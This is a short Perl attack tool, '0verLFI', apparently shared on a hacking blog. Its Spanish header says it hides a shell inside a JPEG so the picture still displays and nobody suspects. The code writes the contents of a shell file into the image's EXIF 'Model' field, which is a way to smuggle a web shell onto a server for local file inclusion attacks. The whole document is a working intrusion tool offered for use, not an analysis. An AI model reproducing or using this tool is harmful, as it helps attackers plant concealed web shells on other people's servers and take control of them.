[PERL] 0verLFI v0.2

1. ####################################################
2. #          0verLFI v0.2 Coded by The X-C3LL        #      
3. ####################################################
4. #  Se trata de una herramienta bastante sencilla   #
5. #  para inyectar una shell en una imagen JPEG      #
6. #  y que esta siga pudiendo ser visualizada        #
7. #  correctamente, de esta forma nadie sospecha.    #
8. #  Lo único que hace es meter la shell dentro      #
9. #  de los metadatos de la foto.                    #
10. ####################################################
11. #             Gr33tz to Seth & CPH Comunity        #
12. ####################################################
13. #          HTTP://0VERL0AD.BLOGSPOT.COM            #
14. ####################################################
15.  
16.  
17.  
18. use Image::ExifTool;
19.  
20. print q(
21.  
22. +-----------------------------------+
23.    0verLFI v0.1 coded by The X-C3LL  
24.  
25.     Http://0verl0ad.blogspot.com  
26. +-----------------------------------+
27.  
28. );
29.  
30. die "[-]Usage: perl 0verLFI.pl <FILE> <IMAGE>\n" unless @ARGV == 2;
31.  
32. my $file = $ARGV[0];
33. my $jpeg = $ARGV[1];
34. print "[+]Image = $jpeg \n";
35. print "[+]Shell = $file \n";
36.  
37. open (HANDLE, $file);
38. @array = <HANDLE>;
39. my $string = join("\n", @array);
40.  
41.  
42. my $tool = Image::ExifTool->new();
43.  
44. $tool->ExtractInfo($jpeg);
45. $tool->SetNewValue("Model", $string);
46. $done = $tool->WriteInfo($jpeg);